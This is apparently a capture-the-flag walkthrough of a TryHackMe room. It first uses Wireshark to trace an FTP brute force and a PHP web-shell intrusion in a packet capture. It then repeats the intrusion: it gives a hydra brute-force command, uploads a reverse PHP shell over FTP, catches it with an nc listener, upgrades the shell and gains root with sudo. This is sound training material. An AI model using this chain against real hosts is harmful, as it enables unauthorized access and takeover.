h4cked

4-minute read
hydra reverse shell Wireshark packet analysis rootkit

h4cked

h4cked is an easy difficulty room on TryHackMe. Below are the steps I followed to answer the questions for this box.

Hints

Task 1 Hints
  • Have you reviewed the packet capture to see what's going on?
  • Look for some commonly used services to find which one is being brute forced by the attacker.
  • Reviewing TCP streams will provide great insight into answering most of these questions.
Task 2 Hints
  • Use hydra to brute force the password for the service identified in Task 1.
  • Don't forget to start a listener on your attacker box.
  • What command can you use to gain elevated privileges once logged in?

Walkthrough

Full Walkthrough

Task 1

Question 1

h4cked question 1

After downloading the pcapng file, open it up in Wireshark and then click on Statistics followed by Protocol Hierarchy. This will show you all the protocols utilized in this packet capture as shown below.

h4cked Wireshark protocols

Based on this, there are two protocols utilized, HTTP and FTP. Let’s close this window and in the filter toolbar, enter the following:

ftp

h4cked Wireshark ftp filter

Next, right click on packet 49 (the first filtered packet) and select Follow and then TCP Stream

h4cked Wireshark follow TCP stream

The window that pops up shows you that this service has attempts to login to it as shown below, so FTP is the answer to Question 1.

h4cked ftp TCP stream

Question 2

This question asks you about a popular brute forcing tool.

h4cked Question 2

A quick Google search for Van Hauser brute force tool will reveal the answer of hydra

h4cked Google van hauser brute force tool

Questions 3 and 4

h4cked Questions 3 and 4

These can be found by following the steps in Question 1. Filtering Wireshark by ftp and then following the first TCP stream. This results in a username of jenny and a password of password123.

h4cked Wireshark Questions 3 and 4

Questions 5 and 6

h4cked Questions 5 and 6

In Wireshark, add the following as your filter:

ftp contains "PWD"

This filters out commands to only show FTP protocols that are running the PWD (print working directory) command.

h4cked Wireshark ftp PWD

Follow the TCP stream (as you did for prior questions) and you will see the server’s response to the PWD request, which is the answer to question 5. Further in this TCP is the answer to Question 6 as well.

h4cked Wireshark ftp PWD TCP Stream

Question 7

h4cked Question 7

Let’s turn our focus to the ftp-data protocol in Wireshark and enter the following filter:

ftp-data"

h4cked Wireshark ftp-data

As we have done previously, Follow the TCP dream for the 2nd packet listed (431).

h4cked shell.php URL

Questions 8 - 13

h4cked Questions 8-13

For these questions you can filter with the following in Wireshark:

frame contains "whoami"

I assumed whoami was the command used as it’s one of the first commands ran to gather information once a foothold has been established.

h4cked Wireshark frame filter

Once filtered, you can do another Follow TCP Stream to get answers to Questions 8 -13:

Question 8

h4cked Question 8 answer

Question 9

h4cked Question 9 answer

Question 10

h4cked Question 10 answer

Question 11

h4cked Question 11 answer

Question 12

h4cked Question 12 answer

Question 13

This one is somewhat general knowledge, but a quick Google search will likely get your answer. The answer is rootkit.

Task 2

There is only one question that needs an answer, which is reading the flag.txt file. Here are the steps to follow to root this host. First, let’s run hydra on the jenny user with the following command on our attacker host.

hydra -t 10 -l jenny -P /usr/share/wordlists/rockyou.txt 10.10.237.6 ftp

Where 10.10.237.6 is the victim host’s IP address. After a few minutes you will uncover the new password for jenny.

h4cked hydra

Great, now we know the FTP password for jenny. Let’s download the reverse PHP shell located here. Save the file as shell.php in your user’s home folder.

h4cked reverse shell modification

Next, let’s ftp as the jenny user over to our victim host from our attacker host using the password we uncovered. To initially connect, run:

ftp <victim ip>

h4cked ftp connection

Next let’s run:

bin

and

put shell.php

to change the mode to binary mode and upload the shell.

h4cked upload reverse shell

On your attacker host, run the following to open up a listener to catch the reverse shell:

nc -nvlp 4444

h4cked nc listener

Next, navigate to http://<attacker ip>/shell.php and you should see a connection to your netcat listener.

h4cked reverse shell connection

Next, let’s get a fully interactive shell with the following python command:

python3 -c 'import pty; pty.spawn("/bin/bash")'

h4cked upgrade shell

You will notice we are running as the www-data user. Let’s run:

su jenny to switch over to the jenny user and enter the password we uncovered earlier.

h4cked su jenny

Next, let’s run the following to change our privileges to root:

sudo su

h4cked su root

Next, run the following commands to change to the root user’s home directory, list that directory’s contents, navigate to the Reptile subdirectory, list that directory’s contents, and then display the flag.txt file.

cd /root

ls -al

cd Reptile

ls -al

cat flag.txt

h4cked root.txt

And that is the end of this box! It has been fully compromised (again).